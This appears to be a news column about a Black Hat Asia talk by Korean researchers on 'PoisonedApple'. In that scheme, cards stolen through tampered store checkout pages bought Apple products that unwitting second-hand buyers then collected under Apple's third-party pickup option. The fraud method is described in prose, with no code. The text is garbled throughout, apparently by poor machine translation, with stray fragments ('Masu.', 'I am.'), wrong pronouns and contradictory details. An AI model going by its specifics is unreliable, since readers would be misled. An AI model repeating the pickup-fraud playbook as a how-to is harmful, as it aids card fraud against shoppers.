At this year’s annual hacking conference, Black Hat Asia, a team of security researchers revealed that cybercriminals used stolen credit cards and Apple Store Online’s “Someone Pick It Up” option to collect $400,000 in just two years. Revealed how he stole more than $1,000. .
9to5Mac Security Bite is offered exclusively by: Mosyle, the only Apple integrated platform. We’re all about making Apple devices ready to use and secure for enterprise use. Our unique, integrated approach to management and security delivers state-of-the-art Apple-specific security solutions for fully automated enforcement and compliance, next-generation EDR, AI-powered Zero Trust, and exclusive privilege management. , combined with the most powerful and modern Apple MDM. It’s on the market. The result is the fully automated Apple Unified Platform, which is now trusted by more than 45,000 organizations and powers millions of Apple devices effortlessly and affordably. I am. Request an extended trial Find out why Mosyle is all about working with Apple today.
In September 2022, she and her colleagues discovered a series of cyberattacks on more than 50 legitimate online stores, and the large-scale data breach that occurred, according to Kim Gyu-young and Cho Hyun-ho of the Korea Financial Security Institute. exposed. However, further analysis revealed that the attackers were interested in more than simple theft of user data.
Cybercriminals manipulated the payment pages of these online stores to send credit card and personal information in addition to legitimate information to the servers in an effort to avoid detection.
“Using multiple vulnerabilities and tools, these threat groups employed various evasion strategies to prevent detection of phishing pages by site administrators and users,” the security duo said in a Black Hat briefing. It is stated in
However, the credit card theft was only part of the plan.
According to our research, one of the main ways attackers obtained cash was by leveraging Apple Store Online’s “receipt contact” policy. “The ultimate goal of this operation was financial gain,” Kim explained.
The plan will begin by selling new Apple products at “discounted” prices in Korean second-hand online stores. The study describes them as comparable to Craiglist and eBay. Once the buyer reaches an agreement with the seller, in this case the threat actor, the previously stolen card credit information is used to purchase the actual product from the Apple Store.
Image provided by: Black Hat Asia/Gyuyeon Kim, Hyunho Cho
Instead of shipping the item, the cybercriminal set up a “someone else picks it up” option on Apple’s website. This allows an authorized individual to pick up an online order at an Apple retail store by presenting a government photo ID and her QR code/order number. The thrift store buyer is designated as a third party who can receive items unknowingly purchased with a stolen credit card.
The buyer pays only after picking up the product, perhaps through a second-hand store. If the buyer does not remit the agreed upon amount, the attacker may miss out.
For example, a brand new iPhone 15 worth $800 might be listed on the used market for $700. The price will be low enough to generate interest, but high enough not to seem like a scam. After finding an interested buyer, the criminal used the stolen credit card number obtained in the phishing operation to purchase the device and embezzle her $700, which the buyer paid from a second-hand store. Masu.
Image provided by: Black Hat Asia/Gyuyeon Kim, Hyunho Cho
“A stolen card was used to pay $10,000 at an Apple store, but the investigation was hampered because Apple refused to cooperate due to internal policies,” researchers at Black Hat Asia said in a more extreme case. Quoted from the presentation. “Despite Mr. Yun’s efforts to immediately report the incident to both the credit card company and the police, the investigation was delayed for more than a month due to Apple’s lack of cooperation. Despite Apple’s commitment to privacy, the investigation was delayed for more than a month. Regardless, the company’s refusal to provide information due to internal policy has sparked criticism not only in Japan but also in the United States.
Gyuyeon Kim and Hyunho Cho call the scheme “PoisonedApple” and believe it has generated $400,000 in the past two years. The current scope is South Korea and Japan, but there is no reason for criminals in other countries, including the United States, to start doing the same thing.
Who is behind this plan?
Researchers believe the culprit is based somewhere in China, as the phishing webpage is registered through a Chinese ISP. Miraculously, while combing through dark web forums, they found the same email address in the source code in simplified Chinese.
Read the full Black Hat briefing and presentation here.
Details about this series
Follow Allin: Twitter/XLinkedIn, Thread
FTC: We use automated affiliate links that generate income. more.
